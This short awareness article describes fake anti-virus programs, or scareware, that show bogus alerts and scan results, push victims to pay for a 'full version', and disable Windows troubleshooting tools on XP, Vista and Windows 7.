Fake anti-viruses are among the most dangerous infections to be cautious about. They pester us with pop-ups listing many supposed risks and, when we click to clean them, ask us to purchase the full version. They include spyware components that take over most of the system processes and disable most of the troubleshooting tools in Windows; because they spy on the computer once installed, they are called spyware. These fake anti-viruses are created by criminals trying to steal your money with the same tactics every time: fake alerts, bogus scan results and interfaces that mimic popular anti-virus software. They make the PC run slowly, and they infect XP, Vista and Windows 7 alike.

 

Fake Anti-Viruses

Anti-virus is the basic security tool that protects us from viruses of every kind. There are more than 145 different anti-virus companies in the market helping us protect our computers.

Taking advantage of this, many people create fake versions of the products on the market. These are a risk that is not easy to spot, and even the anti-virus companies face an uphill task keeping their definitions up to date with the fake anti-viruses that keep appearing.
